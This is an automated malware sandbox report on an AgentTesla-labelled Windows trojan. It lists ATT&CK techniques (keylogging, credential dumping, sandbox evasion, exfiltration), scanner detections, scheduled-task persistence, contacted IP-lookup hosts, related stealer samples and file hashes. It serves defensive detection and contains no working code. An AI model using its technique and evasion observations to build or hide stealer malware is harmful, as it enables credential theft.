Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	12 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
VQsnGWaNi5.exe	75%	Virustotal		Browse
VQsnGWaNi5.exe	87%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
VQsnGWaNi5.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	87%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.48.1	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr	false	high
http://www.carterandcone.coml	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	VQsnGWaNi5.exe, 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F09000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F09000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002998000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F09000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	VQsnGWaNi5.exe, 00000000.00000002.1725694272.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 00000009.00000002.1774693590.0000000003101000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	VQsnGWaNi5.exe, 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002998000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588192
Start date and time:	2025-01-10 22:31:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VQsnGWaNi5.exe renamed because original name is a hash value
Original Sample Name:	ddfbc9803252f22c7a06d2e1a1fd8617f3e5313cd0493809839aa6907291e7c7.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@29/15@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 322 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target VQsnGWaNi5.exe, PID 7284 because it is empty
Execution Graph export aborted for target ywKvCTGbQjXP.exe, PID 7676 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:32:31	API Interceptor	101x Sleep call for process: VQsnGWaNi5.exe modified
16:32:34	API Interceptor	32x Sleep call for process: powershell.exe modified
16:32:36	API Interceptor	87x Sleep call for process: ywKvCTGbQjXP.exe modified
21:32:34	Task Scheduler	Run new task: ywKvCTGbQjXP path: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
193.122.130.0	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	SOA NOV. Gateway Freight_MEDWA0577842.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=	Get hash	malicious	Unknown	Browse	104.17.25.14
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	87J30ulb4q.exe	Get hash	malicious	Unknown	Browse	104.21.96.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	https://services221.com/mm/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
ORACLE-BMC-31898US	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1

Process:	C:\Users\user\Desktop\VQsnGWaNi5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	true
